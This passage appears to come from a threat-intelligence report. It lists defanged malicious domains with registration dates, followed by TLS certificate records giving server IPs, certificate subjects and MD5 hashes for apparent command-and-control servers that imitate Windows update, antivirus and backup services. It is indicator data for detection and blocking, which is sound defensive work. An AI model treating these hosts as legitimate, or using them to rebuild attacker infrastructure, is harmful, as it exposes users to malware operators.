        eleventhserviceupdater[.]com

        3/9/20

        fifthservicehelper[.]com

        3/9/20

        fourservicehelper[.]com

        3/9/20

        eighthservicehelper[.]com

        3/9/20

        eighteenthservicehelper[.]com

        3/9/20

        eighthserviceupdater[.]com

        3/9/20

        fifteenthservicehelper[.]com

        3/9/20

        nineteenthservicehelper[.]com

        3/9/20

        eleventhservicehelper[.]com

        3/14/20

        thirdservice-developer[.]com

        3/14/20

        fifthservice-developer[.]com

        3/15/20

        firstservice-developer[.]com

        3/16/20

        fourthservice-developer[.]com

        3/16/20

        ninethservice-developer[.]com

        3/16/20

        seventhservice-developer[.]com

        3/16/20

        secondservice-developer[.]com

        3/16/20

        sixthservice-developer[.]com

        3/16/20

        tenthservice-developer[.]com

        3/16/20

        eithtservice-developer[.]com

        3/17/20

        servicedupdater[.]com

        3/17/20

        service-updateer[.]com

        3/19/20

        sexyservicee[.]com

        3/19/20

        serviceboostnumberone[.]com

        3/19/20

        servicedbooster[.]com

        3/19/20

        service-hunter[.]com

        3/19/20

        servicedhunter[.]com

        3/19/20

        servicedpower[.]com

        3/19/20

        sexycservice[.]com

        3/23/20

        yourserviceupdater[.]com

        3/23/20

        top-serviceupdater[.]com

        3/23/20

        top-servicebooster[.]com

        3/23/20

        serviceshelps[.]com

        3/23/20

        servicemonsterr[.]com

        3/23/20

        servicehunterr[.]com

        3/23/20

        service-helpes[.]com

        3/23/20

        servicecheckerr[.]com

        3/23/20

        newservicehelper[.]com

        3/23/20

        huntersservice[.]com

        3/23/20

        helpforyourservice[.]com

        3/23/20

        boostyourservice[.]com

        3/26/20

        developmasters[.]com

        3/26/20

        actionshunter[.]com

        5/4/20

        info-develop[.]com

        5/4/20

        ayechecker[.]com

        5/4/20

        service-booster[.]com

        9/18/20

        zapored[.]com

        9/22/20

        gtrsqer[.]com

        9/22/20

        chalengges[.]com

        9/22/20

        caonimas[.]com

        9/22/20

        hakunaman[.]com

        9/22/20

        getinformationss[.]com

        9/22/20

        nomadfunclub[.]com

        9/22/20

        harddagger[.]com

        9/22/20

        errvghu[.]com

        9/22/20

        reginds[.]com

        9/22/20

        gameleaderr[.]com

        9/22/20

        razorses[.]com

        9/22/20

        vnuret[.]com

        9/22/20

        regbed[.]com

        9/22/20

        bouths[.]com

        9/23/20

        ayiyas[.]com

        9/23/20

        serviceswork[.]net

        9/23/20

        moonshardd[.]com

        9/23/20

        hurrypotter[.]com

        9/23/20

        biliyilish[.]com

        9/23/20

        blackhoall[.]com

        9/23/20

        checkhunterr[.]com

        9/23/20

        daggerclip[.]com

        9/23/20

        check4list[.]com

        9/24/20

        chainnss[.]com

        9/29/20

        hungrrybaby[.]com

        9/30/20

        martahzz[.]com

        10/1/20

        jonsonsbabyy[.]com

        10/1/20

        wondergodst[.]com

        10/1/20

        zetrexx[.]com

        10/1/20

        tiancaii[.]com

        10/1/20

        cantliee[.]com

        10/1/20

        realgamess[.]com

        10/1/20

        maybebaybe[.]com

        10/1/20

        saynoforbubble[.]com

        10/1/20

        chekingking[.]com

        10/1/20

        rapirasa[.]com

        10/1/20

        raidbossa[.]com

        10/1/20

        mountasd[.]com

        10/1/20

        puckhunterrr[.]com

        10/1/20

        pudgeee[.]com

        10/1/20

        loockfinderrs[.]com

        10/1/20

        lindasak[.]com

        10/1/20

        bithunterr[.]com

        10/1/20

        voiddas[.]com

        10/1/20

        sibalsakie[.]com

        10/1/20

        giveasees[.]com

        10/1/20

        shabihere[.]com

        10/1/20

        tarhungangster[.]com

        10/1/20

        imagodd[.]com

        10/1/20

        raaidboss[.]com

        10/1/20

        sunofgodd[.]com

        10/1/20

        rulemonster[.]com

        10/1/20

        loxliver[.]com

        10/1/20

        servicegungster[.]com

        10/1/20

        kungfupandasa[.]com

        10/2/20

        check1domains[.]com

        10/5/20

        sweetmonsterr[.]com

        10/5/20

        qascker[.]com

        10/7/20

        remotessa[.]com

        10/7/20

        cheapshhot[.]com

        10/7/20

        havemosts[.]com

        10/7/20

        unlockwsa[.]com

        10/7/20

        sobcase[.]com

        10/7/20

        zhameharden[.]com

        10/7/20

        mixunderax[.]com

        10/7/20

        bugsbunnyy[.]com

        10/7/20

        fastbloodhunter[.]com

        10/7/20

        serviceboosterr[.]com

        10/7/20

        servicewikii[.]com

        10/7/20

        secondlivve[.]com

        10/7/20

        quwasd[.]com

        10/7/20

        luckyhunterrs[.]com

        10/7/20

        wodemayaa[.]com

        10/7/20

        hybriqdjs[.]com

        10/7/20

        gunsdrag[.]com

        10/7/20

        gungameon[.]com

        10/7/20

        servicemount[.]com

        10/7/20

        servicesupdater[.]com

        10/7/20

        service-boosterr[.]com

        10/7/20

        serviceupdatter[.]com

        10/7/20

        dotmaingame[.]com

        10/12/20

        backup1service[.]com

        10/13/20

        bakcup-monster[.]com

        10/13/20

        bakcup-checker[.]com

        10/13/20

        backup-simple[.]com

        10/13/20

        backup-leader[.]com

        10/13/20

        backup-helper[.]com

        10/13/20

        service-checker[.]com

        10/13/20

        nasmastrservice[.]com

        10/14/20

        service-leader[.]com

        10/14/20

        nas-simple-helper[.]com

        10/14/20

        nas-leader[.]com

        10/14/20

        boost-servicess[.]com

        10/14/20

        elephantdrrive[.]com

        10/15/20

        service-hellper[.]com

        10/16/20

        top-backuphelper[.]com

        10/16/20

        best-nas[.]com

        10/16/20

        top-backupservice[.]com

        10/16/20

        bestservicehelper[.]com

        10/16/20

        backupnas1[.]com

        10/16/20

        backupmastter[.]com

        10/16/20

        best-backup[.]com

        10/17/20

        viewdrivers[.]com

        10/19/20

        topservicebooster[.]com

        10/19/20

        topservice-masters[.]com

        10/19/20

        topbackupintheworld[.]com

        10/19/20

        topbackup-helper[.]com

        10/19/20

        simple-backupbooster[.]com

        10/19/20

        top3-services[.]com

        10/19/20

        backup1services[.]com

        10/21/20

        backupmaster-service[.]com

        10/21/20

        backupmasterservice[.]com

        10/21/20

        service1updater[.]com

        10/21/20

        driverdwl[.]com

        10/21/20

        backup1master[.]com

        10/21/20

        boost-yourservice[.]com

        10/21/20

        checktodrivers[.]com

        10/21/20

        backup1helper[.]com

        10/21/20

        driver1updater[.]com

        10/21/20

        driver1master[.]com

        10/23/20

        view-backup[.]com

        10/23/20

        top3servicebooster[.]com

        10/23/20

        servicereader[.]com

        10/23/20

        servicehel[.]com

        10/23/20

        driver-boosters[.]com

        10/23/20

        service1update[.]com

        10/23/20

        service-hel[.]com

        10/23/20

        driver1downloads[.]com

        10/23/20

        service1view[.]com

        10/23/20

        backups1helper[.]com

        10/25/20

        idriveview[.]com

        10/26/20

        debug-service[.]com

        10/26/20

        idrivedwn[.]com

        10/28/20

        driverjumper[.]com

        10/28/20

        service1boost[.]com

        10/28/20

        idriveupdate[.]com

        10/28/20

        idrivehepler[.]com

        10/28/20

        idrivefinder[.]com

        10/28/20

        idrivecheck[.]com

        10/28/20

        idrivedownload[.]com

         

        First Seen

        Server

        Subject

        MD5

        12/12/19

        140.82.60.155:443

        CN=updatemanagir[.]us

        ec16be328c09473d5e5c07310583d85a

        12/21/19

        96.30.192.141:443

        CN=cmdupdatewin[.]com

        3d4de17df25412bb714fda069f6eb27e

        1/6/20

        45.76.49.78:443

        CN=scrservallinst[.]info

        cd6035bd51a44b597c1e181576dd44d9

        1/8/20

        149.248.58.11:443

        CN=updatewinlsass[.]com

        8c581979bd11138ffa3a25b895b97cc0

        1/9/20

        96.30.193.57:443

        CN=winsystemupdate[.]com

        e4e732502b9658ea3380847c60b9e0fe

        1/14/20

        95.179.219.169:443

        CN=jomamba[.]best

        80b7001e5a6e4bd6ec79515769b91c8b

        1/16/20

        140.82.27.146:443

        CN=winsysteminfo[.]com

        29e656ba9d5d38a0c17a4f0dd855b37e

        1/19/20

        45.32.170.9:443

        CN=livecheckpointsrs[.]com

        1de9e9aa8363751c8a71c43255557a97

        1/20/20

        207.148.8.61:443

        CN=ciscocheckapi[.]com

        97ca76ee9f02cfda2e8e9729f69bc208

        1/28/20

        209.222.108.106:443

        CN=timesshifts[.]com

        2bb464585f42180bddccb50c4a4208a5

        1/29/20

        31.7.59.141:443

        CN=updatewinsoftr[.]com

        07f9f766163c344b0522e4e917035fe1

        1/29/20

        79.124.60.117:443

        C=US

        9722acc9740d831317dd8c1f20d8cfbe

        1/29/20

        66.42.86.61:443

        CN=lsassupdate[.]com

        3c9b3f1e12473a0fd28dc37071168870

        1/29/20

        45.76.20.140:443

        CN=cylenceprotect[.]com

        da6ce63f4a52244c3dced32f7164038a

        1/29/20

        45.76.20.140:80

        CN=cylenceprotect[.]com

        da6ce63f4a52244c3dced32f7164038a

        1/30/20

        149.248.5.240:443

        CN=sophosdefence[.]com

        e9b4b649c97cdd895d6a0c56015f2e68

        1/30/20

        144.202.12.197:80

        CN=windefenceinfo[.]com

        c6c63024b18f0c5828bd38d285e6aa58

        1/30/20

        149.248.5.240:80

        CN=sophosdefence[.]com

        e9b4b649c97cdd895d6a0c56015f2e68

        1/30/20

        149.28.246.25:80

        CN=lsasswininfo[.]com

        f9af8b7ddd4875224c7ce8aae8c1b9dd

        1/30/20

        144.202.12.197:443

        CN=windefenceinfo[.]com

        c6c63024b18f0c5828bd38d285e6aa58

        1/30/20

        149.28.246.25:443

        CN=lsasswininfo[.]com

        f9af8b7ddd4875224c7ce8aae8c1b9dd

        1/30/20

        45.77.119.212:443

        CN=taskshedulewin[.]com

        e1dc7cecd3cb225b131bdb71df4b3079

        1/30/20

        45.77.119.212:80

        CN=taskshedulewin[.]com

        e1dc7cecd3cb225b131bdb71df4b3079

        1/30/20

        149.28.122.130:443

        CN=renovatesystem[.]com

        734c26d93201cf0c918135915fdf96af

        1/30/20

        45.32.170.9:80

        CN=livecheckpointsrs[.]com

        1de9e9aa8363751c8a71c43255557a97

        1/30/20

        149.248.58.11:80

        CN=updatewinlsass[.]com

        8c581979bd11138ffa3a25b895b97cc0

        1/30/20

        149.28.122.130:80

        CN=renovatesystem[.]com

        734c26d93201cf0c918135915fdf96af

        1/30/20

        207.148.8.61:80

        CN=ciscocheckapi[.]com

        97ca76ee9f02cfda2e8e9729f69bc208

        1/31/20

        81.17.25.210:443

        CN=update-wind[.]com

        877bf6c685b68e6ddf23a4db3789fcaa

        1/31/20

        31.7.59.141:80

        CN=updatewinsoftr[.]com

        07f9f766163c344b0522e4e917035fe1

        2/2/20

        155.138.214.247:80

        CN=cleardefencewin[.]com

        61df4864dc2970de6dcee65827cc9a54

        2/2/20

        155.138.214.247:443

        CN=cleardefencewin[.]com

        61df4864dc2970de6dcee65827cc9a54

        2/2/20

        45.76.231.195:443

        CN=checkwinupdate[.]com

        d8e5dddeec1a9b366759c7ef624d3b8c

        2/2/20

        45.76.231.195:80

        CN=checkwinupdate[.]com

        d8e5dddeec1a9b366759c7ef624d3b8c

        2/3/20

        46.19.142.154:443

        CN=havesetup[.]net

        cd354c309f3229aff59751e329d8243a

        2/3/20

        95.179.219.169:80

        CN=jomamba[.]best

        80b7001e5a6e4bd6ec79515769b91c8b

        2/3/20

        140.82.60.155:80

        CN=updatemanagir[.]us

        ec16be328c09473d5e5c07310583d85a

        2/3/20

        209.222.108.106:80

        CN=timesshifts[.]com

        2bb464585f42180bddccb50c4a4208a5

        2/3/20

        66.42.118.123:443

        CN=conhostservice[.]com

        6c21d3c5f6e8601e92ae167a7cff721c

        2/4/20

        80.240.18.106:443

        CN=microsoftupdateswin[.]com

        27cae092ad6fca89cd1b05ef1bb73e62

        2/4/20

        95.179.215.228:443

        CN=iexploreservice[.]com

        26010bebe046b3a33bacd805c2617610

        2/12/20

        155.138.216.133:443

        CN=defenswin[.]com

        e5005ae0771fcc165772a154b7937e89

        2/12/20

        45.32.130.5:443

        CN=avrenew[.]com

        f32ee1bb35102e5d98af81946726ec1b

        2/14/20

        45.76.167.35:443

        CN=freeallsafe[.]com

        85f743a071a1d0b74d8e8322fecf832b

        2/14/20

        45.63.95.187:443

        CN=easytus[.]com

        17de38c58e04242ee56a9f3a94e6fd53

        2/17/20

        45.77.89.31:443

        CN=besttus[.]com

        2bda8217bdb05642c995401af3b5c1f3

        2/17/20

        95.179.147.215:443

        CN=windefens[.]com

        57725c8db6b98a3361e0d905a697f9f8

        2/17/20

        155.138.216.133:443

        CN=defenswin[.]com

        c07774a256fc19036f5c8c60ba418cbf

        2/17/20

        104.238.190.126:443

        CN=aaatus[.]com

        4039af00ce7a5287a3e564918edb77cf

        2/17/20

        144.202.83.4:443

        CN=greattus[.]com

        7f0fa9a608090634b42f5f17b8cecff0

        2/17/20

        104.156.245.0:443

        CN=comssite[.]com

        f5bb98fafe428be6a8765e98683ab115

        2/17/20

        45.32.30.162:443

        CN=bigtus[.]com

        698fc23ae111381183d0b92fe343b28b

        2/17/20

        108.61.242.184:443

        CN=livetus[.]com

        8bedba70f882c45f968c2d99b00a708a

        2/17/20

        207.148.15.31:443

        CN=findtus[.]com

        15f07ca2f533f0954bbbc8d4c64f3262

        2/17/20

        149.28.15.247:443

        CN=firsttus[.]com

        88e8551f4364fc647dbf00796536a4c7

        2/21/20

        155.138.136.182:443

        CN=worldtus[.]com

        b31f38b2ccbbebf4018fe5665173a409

        2/25/20

        45.77.58.172:443

        CN=freeoldsafe[.]com

        a46e77b92e1cdfec82239ff54f2c1115

        2/25/20

        45.77.58.172:443

        CN=freeoldsafe[.]com

        a46e77b92e1cdfec82239ff54f2c1115

        2/26/20

        108.61.72.29:443

        CN=myserviceconnect[.]net

        9f551008f6dcaf8e6fe363caa11a1aed

        2/27/20

        216.155.157.249:443

        CN=myserviceupdater[.]com

        4c6a2c06f1e1d15d6be8c81172d1c50c

        2/28/20

        45.77.98.157:443

        CN=topservicesbooster[.]com

        ba4b34962390893852e5cc7fa7c75ba2

        2/28/20

        104.156.250.132:443

        CN=myservicebooster[.]com

        89be5670d19608b2c8e261f6301620e1

        2/28/20

        149.28.50.31:443

        CN=topsecurityservice[.]net

        77e2878842ab26beaa3ff24a5b64f09b

        2/28/20

        149.28.55.197:443

        CN=myyserviceupdater[.]com

        0dd8fde668ff8a301390eef1ad2f9b83

        2/28/20

        207.246.67.70:443

        CN=servicesecurity[.]org

        c88098f9a92d7256425f782440971497

        2/28/20

        63.209.33.131:443

        CN=serviceupdates[.]net

        16e86a9be2bdf0ddc896bc48fcdbb632

        2/29/20

        45.77.206.105:443

        CN=myservicebooster[.]net

        6e09bb541b29be7b89427f9227c30a32

        2/29/20

        140.82.5.67:443

        CN=servicesbooster[.]org

        42d2d09d08f60782dc4cded98d7984ed

        2/29/20

        108.61.209.123:443

        CN=brainschampions[.]com

        241ab042cdcb29df0a5c4f853f23dd31

        2/29/20

        104.156.227.250:443

        CN=servicesbooster[.]com

        f45f9296ff2a6489a4f39cd79c7f5169

        2/29/20

        140.82.10.222:443

        CN=topservicesecurity[.]net

        b9375e7df4ee0f83d7abb179039dc2c5

        2/29/20

        149.28.35.35:443

        CN=topservicesecurity[.]org

        82bd8a2b743c7cc3f3820e386368951d

        2/29/20

        207.148.21.17:443

        CN=topserviceupdater[.]com

        ece184f8a1309b781f912d4f4d65738e

        2/29/20

        45.77.153.72:443

        CN=topservicesupdate[.]com

        8330c3fa8ca31a76dc8d7818fd378794

        3/1/20

        140.82.10.222:80

        CN=topservicesecurity[.]net

        b9375e7df4ee0f83d7abb179039dc2c5

        3/1/20

        207.148.21.17:80

        CN=topserviceupdater[.]com

        ece184f8a1309b781f912d4f4d65738e

        3/1/20

        108.61.90.90:443

        CN=topservicesecurity[.]com

        696aeb86d085e4f6032e0a01c496d26c

        3/1/20

        45.32.130.5:80

        CN=avrenew[.]com

        f32ee1bb35102e5d98af81946726ec1b

        3/2/20

        217.69.15.175:443

        CN=serviceshelpers[.]com

        9a437489c9b2c19c304d980c17d2e0e9

        3/2/20

        155.138.135.182:443

        CN=topservicesupdates[.]com

        b9deff0804244b52b14576eac260fd9f

        3/2/20

        95.179.210.8:80

        CN=serviceuphelper[.]com

        bb65efcead5b979baee5a25756e005d8

        3/2/20

        45.76.45.162:443

        CN=boostsecuritys[.]com

        7d316c63bdc4e981344e84a017ae0212

        3/4/20

        108.61.176.237:443

        CN=yoursuperservice[.]com

        7424aaede2f35259cf040f3e70d707be

        3/4/20

        207.246.67.70:443

        CN=servicesecurity[.]org

        d66cb5528d2610b39bc3cecc20198970

        3/6/20

        188.166.52.176:443

        CN=top-servicebooster[.]com

        f882c11b294a94494f75ded47f6f0ca0

        3/7/20

        149.248.56.113:443

        CN=topservicehelper[.]com

        2a29e359126ec5b746b1cc52354b4adf

        3/8/20

        199.247.13.144:443

        CN=hakunamatatata[.]com

        e2cd3c7e2900e2764da64a719096c0cb

        3/8/20

        95.179.210.8:443

        CN=serviceuphelper[.]com

        bb65efcead5b979baee5a25756e005d8

        3/8/20

        207.246.67.70:443

        CN=servicesecurity[.]org

        d89f6bdc59ed5a1ab3c1ecb53c6e571c

        3/9/20

        194.26.29.230:443

        CN=secondserviceupdater[.]com

        c30a4809c9a77cfc09314a63f7055bf7

        3/9/20

        194.26.29.229:443

        CN=firstserviceupdater[.]com

        bc86a3087f238014b6c3a09c2dc3df42

        3/9/20

        194.26.29.232:443

        CN=fourthserviceupdater[.]com

        3dc6d12c56cc79b0e3e8cd7b8a9c320b

        3/9/20

        194.26.29.234:443

        CN=sixthserviceupdater[.]com

        951e29ee8152c1e7f63e8ccb6b7031c1

        3/9/20

        194.26.29.235:443

        CN=seventhserviceupdater[.]com

        abe1ce0f83459a7fe9c72839fc46330b

        3/9/20

        194.26.29.236:443

        CN=eighthserviceupdater[.]com

        c7a539cffdd230a4ac9a4754c2c68f12

        3/9/20

        194.26.29.237:443

        CN=ninethserviceupdater[.]com

        1d1f7bf2c0eec7a3a0221fd473ddbafc

        3/9/20

        194.26.29.225:443

        CN=seventeenthservicehelper[.]com

        6b1e0621f4d891b8575a229384d0732d

        3/9/20

        194.26.29.227:443

        CN=nineteenthservicehelper[.]com

        38756ffb8f2962f6071e770637a2d962

        3/9/20

        194.26.29.242:443

        CN=thirdservicehelper[.]com

        3b911032d08ff4cb156c064bc272d935

        3/9/20

        194.26.29.244:443

        CN=tenthservicehelper[.]com

        a2d9b382fe32b0139197258e3e2925c4

        3/9/20

        194.26.29.226:443

        CN=eighteenthservicehelper[.]com

        4acbca8efccafd92da9006d0cc91b264

        3/9/20

        194.26.29.243:443

        CN=ninthservicehelper[.]com

        0760ab4a6ed9a124aabb8c377beead54

        3/9/20

        194.26.29.201:443

        CN=secondservicehelper[.]com

        d8a8d0ad9226e3c968c58b5d2324d899

        3/9/20

        194.26.29.202:443

        CN=thirdservicehelper[.]com

        0d3b79158ceee5b6ce859bb3fc501b02

        3/9/20

        194.26.29.220:443

        CN=fourservicehelper[.]com

        831e0445ea580091275b7020f2153b08

        3/11/20

        207.246.67.70:80

        CN=servicesecurity[.]org

        d89f6bdc59ed5a1ab3c1ecb53c6e571c

        3/13/20

        165.227.196.0:443

        CN=twentiethservicehelper[.]com

        977b4abc6307a9b3732229d4d8e2c277

        3/14/20

        45.141.86.91:443

        CN=thirdservice-developer[.]com

        edc2680e3797e11e93573e523bae7265

        3/14/20

        194.26.29.219:443

        CN=firstservisehelper[.]com

        6b444a2cd3e12d4c3feadec43a30c4d6

        3/14/20

        45.141.86.93:443

        CN=fifthservice-developer[.]com

        60e7500c809f12fe6be5681bd41a0eda

        3/15/20

        45.141.86.90:443

        CN=secondservice-developer[.]com

        de9460bd6b1badb7d8314a381d143906

        3/15/20

        45.141.86.84:443

        CN=firstservice-developer[.]com

        6385acd425e68e1d3fce3803f8ae06be

        3/17/20

        45.141.86.96:443

        CN=eithtservice-developer[.]com

        e1d1fb4a6f09fb54e09fb27167028303

        3/17/20

        45.141.86.92:443

        CN=fourthservice-developer[.]com

        5b5375bf30aedfa3a44d758fe42fccba

        3/18/20

        45.141.86.94:443

        CN=sixthservice-developer[.]com

        4d42bea1bfc7f1499e469e85cf75912c

        3/18/20

        108.61.209.121:443

        CN=service-booster[.]com

        692ed54fb1fb189c36d2f1674db47e45

        3/18/20

        134.122.116.114:443

        CN=service-helpes[.]com

        ad0914f72f1716d810e7bd8a67c12a71

        3/18/20

        209.97.130.197:443

        CN=helpforyourservice[.]com

        00fe3cc532f876c7505ddbf5625de404

        3/18/20

        192.241.143.121:443

        CN=serviceshelps[.]com

        e50998208071b4e5a70110b141542747

        3/18/20

        45.141.86.95:443

        CN=seventhservice-developer[.]com

        413ca4fa49c3eb6eef0a6cbc8cac2a71

        3/18/20

        198.211.116.199:443

        CN=actionshunter[.]com

        8e5bedbe832d374b565857cce294f061

        3/18/20

        45.141.86.155:443

        CN=sexyservicee[.]com

        cca37e58b23de9a1db9c3863fe2cd57c

        3/19/20

        194.26.29.239:443

        CN=eleventhserviceupdater[.]com

        7e0fcb78055f0eb12bc8417a6933068d

        3/19/20

        45.141.86.206:443

        CN=servicedhunter[.]com

        fdefb427dcf3f0257ddc53409ff71d22

        3/19/20

        45.141.86.92:443

        CN=service-updateer[.]com

        51ba9c03eac37751fe06b7539964e3de

        3/19/20

        134.122.116.59:443

        CN=servicedbooster[.]com

        db7797a20a5a491fb7ad0d4c84acd7e8

        3/19/20

        134.122.118.46:443

        CN=servicedpower[.]com

        7b57879bded28d0447eea28bacc79fb5

        3/19/20

        134.122.124.26:443

        CN=serviceboostnumberone[.]com

        880982d4781a1917649ce0bb6b0d9522

        3/20/20

        45.141.86.97:443

        CN=ninethservice-developer[.]com

        e4a720edfcc7467741c582cb039f20e0

        3/20/20

        178.62.247.205:443

        CN=top-serviceupdater[.]com

        a45522bd0a26e07ed18787c739179ccb

        3/20/20

        159.203.36.61:443

        CN=yourserviceupdater[.]com

        7b422c90dc85ce261c0a69ba70d8f6b5

        3/20/20

        134.122.20.117:443

        CN=fifthserviceupdater[.]com

        99aa16d7fc34cdcc7dfceab46e990f44

        3/23/20

        165.22.125.178:443

        CN=servicemonsterr[.]com

        82abfd5b55e14441997d47aee4201f6d

        3/24/20

        69.55.60.140:443

        CN=boostyourservice[.]com

        7f3787bf42f11da321461e6db7f295d1

        3/24/20

        45.141.86.98:443

        CN=tenthservice-developer[.]com

        eef29bcbcba1ce089a50aefbbb909203

        3/26/20

        178.79.132.82:443

        CN=developmasters[.]com

        5cf480eba910a625e5e52e879ac5aecb

        3/26/20

        194.26.29.247:443

        CN=thirteenthservicehelper[.]com

        2486df3869c16c0d9c23a83cd61620c2

        5/4/20

        159.65.216.127:443

        CN=info-develop[.]com

        5f7a5fb72c6689934cc5d9c9a681506b

        9/22/20

        69.61.38.155:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gtrsqer[.]com

        d37ba4a4b1885e96ff54d1f139bf3f47

        9/22/20

        96.9.225.144:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=hakunaman[.]com

        4408ba9d63917446b31a0330c613843d

        9/22/20

        96.9.209.216:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=caonimas[.]com

        d921dd1ba03aaf37d5011020577e8147

        9/22/20

        107.173.58.176:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=chalengges[.]com

        dfeb6959b62aff0b93ca20fd40ef01a8

        9/22/20

        96.9.225.143:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=reginds[.]com

        05c03b62dea6ec06006e57fd0a6ba22e

        9/22/20

        69.61.38.156:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=errvghu[.]com

        c14a892f8203a04c7e3298edfc59363a

        9/22/20

        45.34.6.229:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=harddagger[.]com

        7ed16732ec21fb3ec16dbb8df0aa2250

        9/22/20

        45.34.6.226:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=getinformationss[.]com

        1788068aff203fa9c51d85bf32048b9c

        9/22/20

        45.34.6.225:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gameleaderr[.]com

        0fff2f721ad23648175d081672e77df4

        9/22/20

        107.173.58.185:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=razorses[.]com

        b960355ba112136f93798bf85e6392bf

        9/22/20

        107.173.58.183:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nomadfunclub[.]com

        a3d4e6d1f361d9c335effdbd33d12e79

        9/22/20

        107.173.58.175:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bouths[.]com

        e13fbdff954f652f14faf11b735c0ef8

        9/22/20

        185.184.223.194:443

        C=US,ST=CA,L=Texas,O=lol,OU=,CN=regbed[.]com

        67310b30bada4f77f8f336438890d8f2

        9/22/20

        109.70.236.134:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=vnuret[.]com

        ae74cbb9838688363b7928b06963c40a

        9/23/20

        64.44.131.103:443

        C=US,ST=TX,L=Texas,O=serviceswork,OU=,CN=serviceswork[.]net

        af518cc031807f43d646dc508685bcd3

        9/23/20

        69.61.38.157:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=moonshardd[.]com

        c8fd81d6d3c8cbb8256c470a613a7c7b

        9/23/20

        193.142.58.129:443

        C=US,ST=TX,L=Texas,O=zapored,OU=,CN=zapored[.]com

        5a22c3c8a0ed6482cad0e2b867c4c10c

        9/23/20

        45.34.6.223:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=hurrypotter[.]com

        bf598ba46f47919c264514f10ce80e34

        9/23/20

        107.173.58.179:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=biliyilish[.]com

        1c8243e2787421373efcf98fc0975031

        9/23/20

        45.34.6.222:443

        C=US,ST=TX,L=Texas,O=dagger,OU=,CN=daggerclip[.]com

        576d65a68900b270155c2015ac4788bb

        9/23/20

        107.173.58.180:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=blackhoall[.]com

        69643e9b1528efc6ec9037b60498b94c

        9/23/20

        107.173.58.182:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=checkhunterr[.]com

        ca9b7e2fcfd35f19917184ad2f5e1ad3

        9/23/20

        45.34.6.221:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=check4list[.]com

        e5e0f017b00af6f020a28b101a136bad

        9/24/20

        213.252.244.62:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=ayiyas[.]com

        8367a1407ae999644f25f665320a3899

        9/24/20

        185.25.50.167:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=chainnss[.]com

        34a78f1233e53010d29f2a4fa944c877

        9/30/20

        88.119.171.75:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=martahzz[.]com

        eaebbe5a3e3ea1d5992a4dfd4af7a749

        10/1/20

        88.119.171.74:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=jonsonsbabyy[.]com

        adc8cd1285b7ae62045479ed39aa37f5

        10/1/20

        88.119.171.55:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=tiancaii[.]com

        bfe1fd16cd4169076f3fbaab5afcbe12

        10/1/20

        88.119.171.67:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=cantliee[.]com

        c8a623eb355d172fc3e083763934a7f7

        10/1/20

        88.119.171.76:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=realgamess[.]com

        0ac5659596008e64d4d0d90dfb6abe7c

        10/1/20

        88.119.171.68:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=maybebaybe[.]com

        48003b6b638dc7e79e75a581c58f2d77

        10/1/20

        88.119.171.69:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=saynoforbubble[.]com

        5c75a6bbb7454a04b9ea26aa80dfbcba

        10/1/20

        88.119.171.73:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=chekingking[.]com

        e391c997b757424d8b2399cba4733a60

        10/1/20

        88.119.171.77:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=wondergodst[.]com

        035697cac0ee92bb4d743470206bfe9a

        10/1/20

        88.119.171.78:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=zetrexx[.]com

        fc133bed713608f78f9f112ed7498f32

        10/1/20

        213.252.244.38:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=mountasd[.]com

        8ead6021e2a5b9191577c115d4e68911

        10/1/20

        107.173.58.184:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=pudgeee[.]com

        1c9949d20441df2df09d13778b751b65

        10/1/20

        88.119.174.109:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=loockfinderrs[.]com

        c0ddfc954aa007885b467f8c4f70ad75

        10/1/20

        88.119.174.110:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=puckhunterrr[.]com

        ee63098506cb82fc71a4e85043d4763f

        10/1/20

        88.119.174.114:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=voiddas[.]com

        422b020be24b346da826172e4a2cf1c1

        10/1/20

        88.119.174.116:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sibalsakie[.]com

        8d8f046e963bcd008fe4bbed01bed4c8

        10/1/20

        88.119.174.117:443

        C=US,ST=TX,L=TExas,O=lol,OU=,CN=rapirasa[.]com

        c381fb63e9cb6b0fc59dfaf6e8c40af3

        10/1/20

        88.119.174.118:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=raidbossa[.]com

        add6b742d0f992d56bede79888eef413

        10/1/20

        88.119.174.119:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=lindasak[.]com

        9bbd073033e34bfd80f658f0264f6fae

        10/1/20

        88.119.174.121:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bithunterr[.]com

        9afef617897e7089f59c19096b8436c8

        10/1/20

        88.119.174.120:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=giveasees[.]com

        3f366e5f804515ff982c151a84f6a562

        10/1/20

